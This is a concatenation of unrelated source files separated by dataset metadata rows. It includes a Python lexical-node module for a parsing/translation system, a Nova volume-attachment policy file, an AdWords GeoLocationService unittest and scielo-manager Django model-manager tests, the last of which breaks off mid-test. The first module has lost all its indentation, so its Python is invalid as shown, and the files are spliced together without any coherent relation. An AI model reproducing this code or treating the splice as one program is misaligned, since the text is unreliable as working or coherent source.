# -- initialize now adds entries resulting from morphological analysis.
# 2010.10.18 (MG)
# -- Node constructor takes both the original word and possibly preprocessed
# word (form). form is used for lexicalization.
# 2011.02.10
# -- EmptyNode, subclass of Node, created.
# 2011.04.10
# -- Empty nodes keep track of the index of their "source" (mother) node. Needed
# for EmptyNode Principle.
# 2011.05.13
# -- New subclass of EmptyNode for the more complicated general language node mismatch
# case, for examples, prepositions in Qu->Es.
# 2011.12.04
# -- Reverse ComplexEmptyNodes
# 2012.09.11
# -- Lexical entry indices may be constrained during initialization, using problem's (xdg)
# lex_indices.
# 2013.10.29
# -- "Unknown" node; its 'name' is '*', that is, no lexical entry was found.
# 2014.02.04
# -- Nodes know how to use entries that are already morphologically analyzed and/or
# have their crosslingual features already spelled out.
from .variable import *
from .utils import PARSE, GENERATE, TRANSLATE
class Node:
def __init__(self, word, form, lexicon, problem, dstore, dims=None, agree=None,
index=0, process=0, analyses=None, lex=None, arcs=None, eos=False,
empty=False, verbosity=0):
"""
form is the possibly preprocessed form of word. This is used for lexicalization
during parsing.
lex and arcs are non-None for generation.
"""
self.word = word
self.form = form
self.lexicon = lexicon
self.language = lexicon.language
self.problem = problem
# Whether this is an end-of-sentence node
self.eos = eos
## parse, generate, or translate
self.process = process or problem.process
# target language abbreviations
# self.languages = [language.abbrev for language in problem.languages]
self.languages = problem.languages
self.target_languages = self.languages
# add semantics
if problem.semantics:
self.languages = [problem.semantics] + self.languages
# Lexicons to use in inheritance
# Whether to use transfer xlexes in inheritance
self.transfer_xlex = problem.transfer_xlex
# Possibly one or more wordforms for each language
self.forms = {}
# If translation languages have morphological analysis
self.roots = {}
self.dstore = dstore
# Position
self.index = index
# For translation, nodes have different positions in different languages,
# represented by variables that are created by OrderPrinciple
self.positions = {}
## Generation
# A tuple of lexicon key (word, lexeme, gram) and entry index
self.lex = lex
# dict of {dim: {'out': [(label, dest)], 'in': [(label, source)]}}
self.arcs = arcs
# Actual positions in multiple languages
self.positions = {}
self.analyses = analyses
self.entries = []
self.dims = dict((d, {}) for d in dims) if dims else {}
# Agreement dimensions
self.agree = agree
## Lexical entry
# Create a variable for this
self.lexvar = None
# Variables for group IDs (set in GroupP)
self.groupvars = {}
# Empty nodes that are possible daughters of this node.
# dict keeps track of the node and entry indices for each empty node entry:
# {empty_entry: [empty_node, mother_entry_index1, ...]}
if not empty:
self.empty_nodes = {}
self.empty = False
else:
self.empty = True
# Determined SVar with this node's index as its value; called 'eq' by Debusmann
self.dsvar = DetSVar('{}='.format(self.index), {self.index})
self.initialize(dims, verbosity=verbosity)
def __repr__(self):
return '&{}{}'.format(self.index, self.word)
def initialize(self, dimensions, verbosity=1):
"""Find lexical entries and create all variables."""
lex_indices = self.problem.lex_indices[self.index]
if lex_indices is None:
lex_indices = set()
elif not isinstance(lex_indices, set):
lex_indices = {lex_indices}
entries = self.lexicon.lexicalize(self.form, clone=True, indices=lex_indices, any_other=self.analyses,
verbosity=verbosity)
# print('{}/{} entries following lexicalization: {}'.format(self, self.form, entries))
if self.analyses:
# print('Morphological analyses for {}: {}'.format(self, self.analyses))
if verbosity:
print("Incorporating morphological analysis for", self)
entries.extend(self.lexicon.incorp_analyses(self.analyses, self.agree,
word=self.form, problem=self.problem))
# entries.extend(self.lexicon.lexicalize(self.form, clone=True, indices=lex_indices))
print('Entries before crossling inh: {}'.format(entries))
# For each entry, inherit properties from lexical classes.
# For flattened lexicons, the only inheritance that happens is across languages.
if self.languages or self.lexicon.hierarchical:
unknown = None
lang_abbrevs = [l.abbrev for l in self.target_languages]
to_incorp = []
for entry in entries:
if entry.is_inherited(lang_abbrevs):
print('Entry {} is cross-inherited for {}'.format(entry, lang_abbrevs))
self.entries.append(entry)
continue
# Any additional entries found from classes during inheritance
add_entries = []
# Accumulate entries to add
self.lexicon.inherit(entry, [d.abbrev for d in dimensions],
add_entries=add_entries, node=self,
languages=self.languages,
target_languages=self.target_languages,
process=self.process,
transfer_xlex=self.transfer_xlex,
verbosity=verbosity)
if add_entries:
# print('{} add entries {}, languages {}'.format(self, add_entries, lang_abbrevs))
for e in add_entries:
if any([e.is_unknown(l) for l in lang_abbrevs]):
# print('{} is unknown'.format(e))
unknown = e
else:
to_incorp.append(e)
# print('Add {} to entries'.format(e))
self.entries.append(e)
# If there are no other entries, use the (last) unknown one
if not self.entries and unknown:
# print('No entries for {}, adding unknown'.format(self))
self.entries = [unknown]
# # Add any new entries found to the node
# self.entries.extend(add_entries)
# This is where new cross-lingual entries get created and stored.
if self.languages and to_incorp:
self.lexicon.incorp_cross_inh(self.word, to_incorp)
# Set probabilities on the basis of lex xcounts
if len(self.entries) > 1:
if verbosity:
print("Setting probabilities for {} entries".format(len(self.entries)))
total = sum([e.xcount for e in self.entries])
for e in self.entries:
e.prob = e.xcount / total
else:
self.entries = entries
# Set entry probabilities on the basis of lex counts
if len(entries) > 1:
if verbosity:
print("Setting probabilities for {} entries".format(len(entries)))
# Set probabilities for different analyses
total = sum([e.count for e in entries])
for e in entries:
e.prob = e.count / total
# for e in self.entries:
# if e.crosslexes:
# print('Removing crosslexes from {}'.format(e))
# e.crosslexes = {}
# Assign entry scores
self.scores = [0 for e in self.entries]
if not self.entries:
print('NO ENTRIES FOR {}!'.format(self))
def finalize(self, verbosity=1):
"""Set lexical variable and normalize probabilities."""
## Variable for node's entries
lexvar_name = '{}{}'.format(self.index, self.word)
if len(self.entries) == 1:
# Determine the variable now if there's no ambiguity
self.lexvar = DetIVar(lexvar_name, 0)
else:
# Normalize the probabilities
prob_total = sum([e.prob for e in self.entries])
for e in self.entries:
e.prob /= prob_total
for e in self.entries:
if verbosity:
print(' {} prob: {}'.format(e, e.prob))
# total = sum([e.count for e in self.entries])
# for e in self.entries:
# e.prob *= e.count / total
# print(' {}: count {}, prob {}'.format(e, e.count, e.prob))
self.lexvar = IVar(lexvar_name,
range(len(self.entries)),
problem=self.problem, rootDS=self.dstore)
def rank(self, verbosity=0):
"""Rank and sort entries by score, eliminating those with negative scores."""
entries_scores = list(zip(self.entries, self.scores))
entries_scores.sort(key=lambda e_s: e_s[1], reverse=True)
# for e, s in entries_scores:
# if s < 0:
# print('Entry {} eliminated'.format(e))
self.entries = [e for e, s in entries_scores if s >= 0]
def is_novel(self):
"""Is this a node for an unknown word?"""
if len(self.entries) == 1 and self.entries[0].name == '*':
return True
return False
## Debugging methods for examining various node variables
def exam_vars(self, dim_abbrev='', vartype='', var=''):
dimD = self.dims
varD = None
for dim, vars in dimD.items():
if dim.abbrev == dim_abbrev:
varD = vars
if varD:
if vartype:
vars = varD.get(vartype)
if var and vars:
return vars.get(var)
elif vars:
return vars
# v = vars.get(var)
# if v: v.pprint()
# return v
else:
# for v in vars: v.pprint()
return varD
def exam_valency(self, dim_abbrev='', outs=True, var=''):
return self.exam_vars(dim_abbrev=dim_abbrev,
vartype = 'outvars' if outs else 'invars',
var=var)
def exam_agr(self, dim_abbrev='', var=''):
return self.exam_vars(dim_abbrev=dim_abbrev,
vartype = 'agrvars',
var=var)
def exam_lex(self, dstore=None):
self.lexvar.pprint(dstore=dstore)
return self.lexvar
def get_possible_labels(self, dim, out=True):
"""Assign list of labels for possible in and out arcs for each dimension.
Used in arc disambiguation."""
labels = set()
for entry, score in zip(self.entries, self.scores):
if score >= 0:
# Only record labels for entries that have not been excluded
entry_dim = entry.dims.get(dim.abbrev)
if entry_dim:
arcs = entry_dim.attribs.get('outs' if out else 'ins', {})
for label, attrib in arcs.items():
if attrib is not 0:
labels.add(label)
return labels
def get_required_labels(self, entry, dim, out=True):
"""Assign list of required out or in labels for a given entry on a dimension.
Used in arc disambiguation.
"""
d = entry.dims.get(dim.abbrev)
if d:
arcs = d.attribs.get('outs' if out else 'ins')
if arcs:
return [label for label, attrib in arcs.items() if attrib in ('!', '+')]
return []
def get_dim_dict(self, abbrev):
"""Get the dimension dict associated with the dimension with abbreviation abbrev."""
for dim, dct in self.dims.items():
if dim.abbrev == abbrev:
return dct
return {}
class EmptyNode(Node):
'''Empty nodes: no form, at least in some language. They may end up "used" (with non-del in arcs
on the dimension where they are created), or "unused" (with del in arcs on the dimension where they
are created).'''
def __init__(self, lexicon, problem, dstore, entry_key, src_entry, src_node_index,
dims=None, verbosity=0, index=-1):
# An empty node starts with an entry already created ...
# self.entry = entry.clone()
# ... and source (mother) entry that it came from
self.src_entry = src_entry
# ... and a source (mother) node.
self.src_node_index = src_node_index
self.complex = False
Node.__init__(self, entry_key + str(src_node_index), entry_key, lexicon, problem, dstore,
dims=dims, index=index, empty=True, eos=False)
print('Created empty node {}, source: {}'.format(self, src_entry))
# Node.__init__(self, entry.name + str(src_node_index), '', lexicon, problem, dstore,
# dims=dims, index=index, empty=True, eos=False)
# def __repr__(self):
# return '&{}{}'.format(self.index, self.entry.name)
def initialize(self, dimensions, verbosity=0):
"""Find lexical entries and create all variables."""
self.entries = []
entries = self.lexicon.lexicalize(self.form, word=False, clone=True)
# print('Empty node entries found for {}: {}'.format(self.form, entries))
# self.entries = []
# entries = [self.entry]
# For each entry, inherit properties from lexical classes
if self.languages or self.lexicon.hierarchical:
for entry in entries:
# Any additional entries found from classes during inheritance
# print('Adding entries for empty node {} starting with {}'.format(self, entry))
add_entries = []
# Accumulate entries to add
self.lexicon.inherit(entry, [d.abbrev for d in dimensions],
add_entries=add_entries, node=self,
languages=self.languages,
target_languages=self.target_languages,
process=self.process,
transfer_xlex=self.transfer_xlex,
verbosity=verbosity)
if add_entries:
# Add any new entries found to the node
self.entries.extend(add_entries)
else:
self.entries = entries
# if not self.entries:
# print('NO ENTRIES FOR {}!'.format(self))
# Assign entry scores
self.scores = [0 for e in self.entries]
def finalize(self, verbosity=1):
n_entries = len(self.entries)
if n_entries == 0:
print("WARNING: NO ENTRIES FOUND FOR {}".format(self))
lexvar_name = '{}{}'.format(self.index, self.word)
if n_entries == 1:
# Determine the variable now if there's no ambiguity
self.lexvar = DetIVar(lexvar_name, 0)
else:
## Variable for node's entries.
self.lexvar = IVar(lexvar_name,
set(range(n_entries)),
problem=self.problem, rootDS=self.dstore)
class ComplexEmptyNode(EmptyNode):
'''Empty node with entries in two different languages, one "zero", and a relationship, "mother"
or "daughter", with another node.'''
def __init__(self, lexicon, problem, dstore, entry,
src_entry, src_entry_index, src_node_index,
targ_entries=None,
targ_lexicon=None, rel=None,
dims=None, rev=False, if_dim='',
verbosity=0, index=-1):
# print('Making complex empty node; empty entry {}, src entry {}, if dim {}'.format(entry, src_entry, if_dim))
self.entry = entry
self.target_entries = [e.clone() for e in targ_entries]
# for e in self.target_entries:
#$ print(' {} names {}'.format(e, e.names))
self.target_lexicon = targ_lexicon
self.target_language = targ_lexicon.language.abbrev
self.rel = rel or ['mother']
self.rev = rev
self.if_dim = if_dim
# A hack to make sure the node's entry has the right 'name', etc.
for e in self.target_entries:
current_names = e.names.get(self.target_language, {})
if self.target_language not in e.names:
e.names[self.target_language] = current_names
if e.word:
current_names['word'] = e.word
elif e.lexeme:
current_names['lexeme'] = e.lexeme
elif e.gram:
current_names['gram'] = e.gram
if e.pos:
current_names['pos'] = e.pos
if e.root:
current_names['root'] = e.root
EmptyNode.__init__(self, lexicon, problem, dstore, entry.name, src_entry, src_node_index,
dims=dims, verbosity=verbosity, index=index)
self.complex = True
# self.trigger_entry_index = src_entry_index
# def __repr__(self):
# return '&{}@{}'.format(self.index, self.target_entries[0].get_name())
def initialize(self, dimensions, verbosity=0):
"""Find lexical entries and create all variables."""
entries = self.lexicon.lexicalize(self.form, word=False, clone=True)
# print('Empty node entries found for {}: {}'.format(self.form, entries))
self.entries = []
# add_entries = self.target_entries[:]
dims = [d.abbrev for d in dimensions]
src_language = self.problem.language
add_entries = []
# print('<<<<<Inheriting for', self, 'and',
# self.target_entries, 'lexicon', self.target_lexicon)
if self.languages or self.lexicon.hierarchical:
for targ in self.target_entries:
# print('{} inheriting from {}, dims {}'.format(self, targ, dims))
# print('Names {}'.format(targ.names))
add_entries = []
self.target_lexicon.inherit(targ, dims, node=self,
add_entries=add_entries,
languages=self.languages,
target_languages=self.target_languages,
transfer_xlex=self.transfer_xlex,
# If reverse is True, we'll inherit back from the target lexical
# node to its translation in the source language instead of maintaining.
# But will this work for non-chunk translation??
reverse=False,
process=self.process,
src_language=src_language,
verbosity=verbosity)
self.entries.extend(add_entries)
for e in self.entries:
# print(' Inheriting from lex {}'.format(self.entry))
# for d in dims:
# if 'synsyn' not in d:
# if d in e.dims:
# ins = e.dims[d].__dict__.get('attribs', {}).get('ins')
# if ins:
# print(' Ins for {}/{}: {}'.format(e, d, ins))
self.lexicon.inherit(e, dims, node=self,
classes=[[self.entry]],
add_entries=add_entries,
languages=self.languages,
target_languages=self.target_languages,
transfer_xlex=self.transfer_xlex,
# reverse used to be True here too, but this doesn't work with
# chunking
reverse=False,
process=self.process,
src_language=src_language,
verbosity=verbosity)
else:
self.entries = entries
# self.entries = add_entries
# if not self.rev:
# add_entries = []
# for targ in self.target_entries:
# self.target_lexicon.inherit(self.entry, dims, node=self,
# classes=[[self.entry]],
# add_entries=add_entries,
# languages=self.languages,
# target_languages=self.target_languages,
# transfer_xlex=self.transfer_xlex,
# reverse=True, process=self.process,
# src_language=src_language,
# verbosity=verbosity)
#
# if add_entries:
# self.entries.extend(add_entries)
# Assign entry scores
self.scores = [0 for e in self.entries]
def finalize(self, verbosity=1):
lexvar_name = '{}{}'.format(self.index, self.word)
if len(self.entries) == 1:
# Determine the variable now if there's no ambiguity
self.lexvar = DetIVar(lexvar_name, 0)
else:
## Variable for node's entries.
self.lexvar = IVar('{}{}'.format(self.index, self.word),
set(range(len(self.entries))),
problem=self.problem, rootDS=self.dstore)
# print('{} has entries: {}'.format(self, self.entries))
| gpl-3.0 | 3,774,457,073,550,813,000 | 44.059369 | 117 | 0.537077 | false |
vmturbo/nova | nova/policies/volumes_attachments.py | 1 | 2496 | # Copyright 2016 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_policy import policy
from nova.policies import base
POLICY_ROOT = 'os_compute_api:os-volumes-attachments:%s'
volumes_attachments_policies = [
base.create_rule_default(
POLICY_ROOT % 'index',
base.RULE_ADMIN_OR_OWNER,
"List volume attachments for an instance",
[
{'method': 'GET',
'path': '/servers/{server_id}/os-volume_attachments'
}
]),
base.create_rule_default(
POLICY_ROOT % 'create',
base.RULE_ADMIN_OR_OWNER,
"Attach a volume to an instance",
[
{
'method': 'POST',
'path': '/servers/{server_id}/os-volume_attachments'
}
]),
base.create_rule_default(
POLICY_ROOT % 'show',
base.RULE_ADMIN_OR_OWNER,
"Show details of a volume attachment",
[
{
'method': 'GET',
'path':
'/servers/{server_id}/os-volume_attachments/{attachment_id}'
}
]),
policy.RuleDefault(
name=POLICY_ROOT % 'discoverable',
check_str=base.RULE_ANY),
base.create_rule_default(
POLICY_ROOT % 'update',
base.RULE_ADMIN_API,
"Update a volume attachment",
[
{
'method': 'PUT',
'path':
'/servers/{server_id}/os-volume_attachments/{attachment_id}'
}
]),
base.create_rule_default(
POLICY_ROOT % 'delete',
base.RULE_ADMIN_OR_OWNER,
"Detach a volume from an instance",
[
{
'method': 'DELETE',
'path':
'/servers/{server_id}/os-volume_attachments/{attachment_id}'
}
]),
]
def list_rules():
return volumes_attachments_policies
| apache-2.0 | 6,217,302,918,994,485,000 | 28.714286 | 78 | 0.555288 | false |
nearlyfreeapps/python-googleadwords | tests/adspygoogle/adwords/geo_location_service_unittest.py | 1 | 2974 | #!/usr/bin/python
# -*- coding: UTF-8 -*-
#
# Copyright 2010 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests to cover GeoLocationService."""
__author__ = 'api.sgrinberg@gmail.com (Stan Grinberg)'
import os
import sys
sys.path.insert(0, os.path.join('..', '..', '..'))
import unittest
from tests.adspygoogle.adwords import HTTP_PROXY
from tests.adspygoogle.adwords import SERVER_V201109
from tests.adspygoogle.adwords import TEST_VERSION_V201109
from tests.adspygoogle.adwords import VERSION_V201109
from tests.adspygoogle.adwords import client
class GeoLocationServiceTestV201109(unittest.TestCase):
"""Unittest suite for GeoLocationService using v201109."""
SERVER = SERVER_V201109
VERSION = VERSION_V201109
client.debug = False
service = None
def setUp(self):
"""Prepare unittest."""
print self.id()
if not self.__class__.service:
self.__class__.service = client.GetGeoLocationService(
self.__class__.SERVER, self.__class__.VERSION, HTTP_PROXY)
def testGetGeoLocationInfo(self):
"""Test whether we can fetch geo location information for the address."""
selector = {
'addresses': [
{
'streetAddress': '1600 Amphitheatre Parkway',
'cityName': 'Mountain View',
'provinceCode': 'US-CA',
'provinceName': 'California',
'postalCode': '94043',
'countryCode': 'US'
},
{
'streetAddress': '76 Ninth Avenue',
'cityName': 'New York',
'provinceCode': 'US-NY',
'provinceName': 'New York',
'postalCode': '10011',
'countryCode': 'US'
},
{
'streetAddress': '\u4e94\u56db\u5927\u88571\u53f7, Beijing\u4e1c\u57ce\u533a',
'countryCode': 'CN'
}
]
}
self.assert_(isinstance(self.__class__.service.Get(selector), tuple))
def makeTestSuiteV201109():
"""Set up test suite using v201109.
Returns:
TestSuite test suite using v201109.
"""
suite = unittest.TestSuite()
suite.addTests(unittest.makeSuite(GeoLocationServiceTestV201109))
return suite
if __name__ == '__main__':
suites = []
if TEST_VERSION_V201109:
suites.append(makeTestSuiteV201109())
if suites:
alltests = unittest.TestSuite(suites)
unittest.main(defaultTest='alltests')
| apache-2.0 | 4,193,252,725,452,182,000 | 29.979167 | 94 | 0.640215 | false |
jfunez/scielo-manager | scielomanager/journalmanager/tests/tests_modelmanagers.py | 1 | 36083 | # coding: utf-8
from django.test import TestCase
from django_factory_boy import auth
from journalmanager import (
models,
modelmanagers,
)
from journalmanager.tests import modelfactories
class JournalManagerTests(TestCase):
def _make_user(self, *collection):
user = auth.UserF(is_active=True)
for coll in collection:
coll.add_user(user, is_manager=True)
return user
def test_manager_base_interface(self):
mandatory_attrs = ['all', 'active']
for attr in mandatory_attrs:
self.assertTrue(hasattr(models.Journal.userobjects, attr))
def test_queryset_base_interface(self):
mandatory_attrs = ['all', 'active', 'available', 'unavailable']
mm = modelmanagers.JournalQuerySet()
for attr in mandatory_attrs:
self.assertTrue(hasattr(mm, attr))
def test_all_returns_user_objects_no_matter_the_active_context(self):
collection1 = modelfactories.CollectionFactory.create()
collection2 = modelfactories.CollectionFactory.create()
user = self._make_user(collection1, collection2)
collection2.make_default_to_user(user)
journal1 = modelfactories.JournalFactory.create(collection=collection1)
journal2 = modelfactories.JournalFactory.create(collection=collection2)
modelfactories.JournalFactory.create()
def get_user_collections():
return user.user_collection.all()
user_journals = models.Journal.userobjects.all(
get_all_collections=get_user_collections)
self.assertEqual(user_journals.count(), 2)
self.assertIn(journal1, user_journals)
self.assertIn(journal2, user_journals)
def test_active_returns_user_objects_bound_to_the_active_context(self):
collection1 = modelfactories.CollectionFactory.create()
collection2 = modelfactories.CollectionFactory.create()
user = self._make_user(collection1, collection2)
collection2.make_default_to_user(user)
modelfactories.JournalFactory.create(collection=collection1)
journal2 = modelfactories.JournalFactory.create(collection=collection2)
modelfactories.JournalFactory.create()
def get_active_collection():
return user.user_collection.get(usercollections__is_default=True)
user_journals = models.Journal.userobjects.active(
get_active_collection=get_active_collection)
self.assertEqual(user_journals.count(), 1)
self.assertIn(journal2, user_journals)
def test_startswith_is_based_on_title_attr(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
journal1 = modelfactories.JournalFactory.create(
title=u'ABC', collection=collection)
journal2 = modelfactories.JournalFactory.create(
title=u'XYZ', collection=collection)
def get_user_collections():
return user.user_collection.all()
user_journals = models.Journal.userobjects.all(
get_all_collections=get_user_collections).startswith('ABC')
self.assertEqual(user_journals.count(), 1)
self.assertIn(journal1, user_journals)
def test_startswith_is_case_insensitive(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
journal1 = modelfactories.JournalFactory.create(
title=u'ABC', collection=collection)
journal2 = modelfactories.JournalFactory.create(
title=u'XYZ', collection=collection)
def get_user_collections():
return user.user_collection.all()
upper_cased = models.Journal.userobjects.all(
get_all_collections=get_user_collections).startswith('ABC')
lower_cased = models.Journal.userobjects.all(
get_all_collections=get_user_collections).startswith('abc')
self.assertEqual(
[j.pk for j in upper_cased],
[j.pk for j in lower_cased]
)
def test_startswith_returns_empty_if_there_are_not_matches(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
modelfactories.JournalFactory.create(
title=u'ABC', collection=collection)
def get_user_collections():
return user.user_collection.all()
user_journals = models.Journal.userobjects.all(
get_all_collections=get_user_collections).startswith('XYZ')
self.assertEqual(user_journals.count(), 0)
def test_startswith_coerces_term_to_unicode(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
modelfactories.JournalFactory.create(
title=u'7ABC', collection=collection)
def get_user_collections():
return user.user_collection.all()
user_journals = models.Journal.userobjects.all(
get_all_collections=get_user_collections).startswith(7)
self.assertEqual(user_journals.count(), 1)
def test_simple_search_is_based_on_title_attr(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
journal1 = modelfactories.JournalFactory.create(
title=u'ABC 123', collection=collection)
journal2 = modelfactories.JournalFactory.create(
title=u'XYZ', collection=collection)
def get_user_collections():
return user.user_collection.all()
user_journals = models.Journal.userobjects.all(
get_all_collections=get_user_collections).simple_search('123')
self.assertEqual(user_journals.count(), 1)
self.assertIn(journal1, user_journals)
def test_simple_search_is_case_insensitive(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
journal1 = modelfactories.JournalFactory.create(
title=u'ABC BAZ', collection=collection)
journal2 = modelfactories.JournalFactory.create(
title=u'XYZ', collection=collection)
def get_user_collections():
return user.user_collection.all()
upper_cased = models.Journal.userobjects.all(
get_all_collections=get_user_collections).simple_search('BAZ')
lower_cased = models.Journal.userobjects.all(
get_all_collections=get_user_collections).simple_search('baz')
self.assertEqual(
[j.pk for j in upper_cased],
[j.pk for j in lower_cased]
)
def test_simple_search_returns_empty_if_there_are_not_matches(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
modelfactories.JournalFactory.create(
title=u'ABC', collection=collection)
def get_user_collections():
return user.user_collection.all()
user_journals = models.Journal.userobjects.all(
get_all_collections=get_user_collections).simple_search('XYZ')
self.assertEqual(user_journals.count(), 0)
def test_simple_search_coerces_term_to_unicode(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
modelfactories.JournalFactory.create(
title=u'7 ABC', collection=collection)
def get_user_collections():
return user.user_collection.all()
user_journals = models.Journal.userobjects.all(
get_all_collections=get_user_collections).simple_search(7)
self.assertEqual(user_journals.count(), 1)
def test_available_returns_non_trashed_items(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
modelfactories.JournalFactory.create(
collection=collection, is_trashed=False)
def get_user_collections():
return user.user_collection.all()
user_journals = models.Journal.userobjects.all(
get_all_collections=get_user_collections).available()
self.assertEqual(user_journals.count(), 1)
def test_available_ignores_trashed_items(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
modelfactories.JournalFactory.create(
collection=collection, is_trashed=True)
def get_user_collections():
return user.user_collection.all()
user_journals = models.Journal.userobjects.all(
get_all_collections=get_user_collections).available()
self.assertEqual(user_journals.count(), 0)
def test_unavailable_returns_trashed_items(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
modelfactories.JournalFactory.create(
collection=collection, is_trashed=True)
def get_user_collections():
return user.user_collection.all()
user_journals = models.Journal.userobjects.all(
get_all_collections=get_user_collections).unavailable()
self.assertEqual(user_journals.count(), 1)
def test_unavailable_ignores_non_trashed_items(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
modelfactories.JournalFactory.create(
collection=collection, is_trashed=False)
def get_user_collections():
return user.user_collection.all()
user_journals = models.Journal.userobjects.all(
get_all_collections=get_user_collections).unavailable()
self.assertEqual(user_journals.count(), 0)
def test_current(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
modelfactories.JournalFactory.create(
collection=collection, pub_status='current')
def get_user_collections():
return user.user_collection.all()
user_journals = models.Journal.userobjects.all(
get_all_collections=get_user_collections).current()
self.assertEqual(user_journals.count(), 1)
for j in user_journals:
self.assertEqual(j.pub_status, 'current')
def test_suspended(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
modelfactories.JournalFactory.create(
collection=collection, pub_status='suspended')
def get_user_collections():
return user.user_collection.all()
user_journals = models.Journal.userobjects.all(
get_all_collections=get_user_collections).suspended()
self.assertEqual(user_journals.count(), 1)
for j in user_journals:
self.assertEqual(j.pub_status, 'suspended')
def test_deceased(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
modelfactories.JournalFactory.create(
collection=collection, pub_status='deceased')
def get_user_collections():
return user.user_collection.all()
user_journals = models.Journal.userobjects.all(
get_all_collections=get_user_collections).deceased()
self.assertEqual(user_journals.count(), 1)
for j in user_journals:
self.assertEqual(j.pub_status, 'deceased')
def test_inprogress(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
modelfactories.JournalFactory.create(
collection=collection, pub_status='inprogress')
def get_user_collections():
return user.user_collection.all()
user_journals = models.Journal.userobjects.all(
get_all_collections=get_user_collections).inprogress()
self.assertEqual(user_journals.count(), 1)
for j in user_journals:
self.assertEqual(j.pub_status, 'inprogress')
class SectionManagerTests(TestCase):
def _make_user(self, *collection):
user = auth.UserF(is_active=True)
for coll in collection:
coll.add_user(user, is_manager=True)
return user
def test_manager_base_interface(self):
mandatory_attrs = ['all', 'active']
for attr in mandatory_attrs:
self.assertTrue(hasattr(models.Section.userobjects, attr))
def test_queryset_base_interface(self):
mandatory_attrs = ['all', 'active', 'available', 'unavailable']
mm = modelmanagers.SectionQuerySet()
for attr in mandatory_attrs:
self.assertTrue(hasattr(mm, attr))
def test_all_returns_user_objects_no_matter_the_active_context(self):
collection1 = modelfactories.CollectionFactory.create()
collection2 = modelfactories.CollectionFactory.create()
user = self._make_user(collection1, collection2)
collection2.make_default_to_user(user)
journal1 = modelfactories.JournalFactory.create(collection=collection1)
section1 = modelfactories.SectionFactory.create(journal=journal1)
journal2 = modelfactories.JournalFactory.create(collection=collection2)
section2 = modelfactories.SectionFactory.create(journal=journal2)
def get_user_collections():
return user.user_collection.all()
user_sections = models.Section.userobjects.all(
get_all_collections=get_user_collections)
self.assertEqual(user_sections.count(), 2)
self.assertIn(section1, user_sections)
self.assertIn(section2, user_sections)
def test_active_returns_user_objects_bound_to_the_active_context(self):
collection1 = modelfactories.CollectionFactory.create()
collection2 = modelfactories.CollectionFactory.create()
user = self._make_user(collection1, collection2)
collection2.make_default_to_user(user)
journal1 = modelfactories.JournalFactory.create(collection=collection1)
section1 = modelfactories.SectionFactory.create(journal=journal1)
journal2 = modelfactories.JournalFactory.create(collection=collection2)
section2 = modelfactories.SectionFactory.create(journal=journal2)
def get_active_collection():
return user.user_collection.get(usercollections__is_default=True)
user_sections = models.Section.userobjects.active(
get_active_collection=get_active_collection)
self.assertEqual(user_sections.count(), 1)
self.assertIn(section2, user_sections)
def test_available_returns_non_trashed_items(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
journal = modelfactories.JournalFactory.create(
collection=collection)
modelfactories.SectionFactory.create(
journal=journal, is_trashed=False)
def get_user_collections():
return user.user_collection.all()
user_sections = models.Section.userobjects.all(
get_all_collections=get_user_collections).available()
self.assertEqual(user_sections.count(), 1)
def test_available_ignores_trashed_items(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
journal = modelfactories.JournalFactory.create(
collection=collection)
modelfactories.SectionFactory.create(
journal=journal, is_trashed=True)
def get_user_collections():
return user.user_collection.all()
user_sections = models.Section.userobjects.all(
get_all_collections=get_user_collections).available()
self.assertEqual(user_sections.count(), 0)
def test_unavailable_returns_trashed_items(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
journal = modelfactories.JournalFactory.create(
collection=collection)
modelfactories.SectionFactory.create(
journal=journal, is_trashed=True)
def get_user_collections():
return user.user_collection.all()
user_sections = models.Section.userobjects.all(
get_all_collections=get_user_collections).unavailable()
self.assertEqual(user_sections.count(), 1)
def test_unavailable_ignores_non_trashed_items(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
journal = modelfactories.JournalFactory.create(
collection=collection)
modelfactories.SectionFactory.create(
journal=journal, is_trashed=False)
def get_user_collections():
return user.user_collection.all()
user_sections = models.Section.userobjects.all(
get_all_collections=get_user_collections).unavailable()
self.assertEqual(user_sections.count(), 0)
class SponsorManagerTests(TestCase):
def _make_user(self, *collection):
user = auth.UserF(is_active=True)
for coll in collection:
coll.add_user(user, is_manager=True)
return user
def test_manager_base_interface(self):
mandatory_attrs = ['all', 'active']
for attr in mandatory_attrs:
self.assertTrue(hasattr(models.Sponsor.userobjects, attr))
def test_queryset_base_interface(self):
mandatory_attrs = ['all', 'active', 'available', 'unavailable']
mm = modelmanagers.SponsorQuerySet()
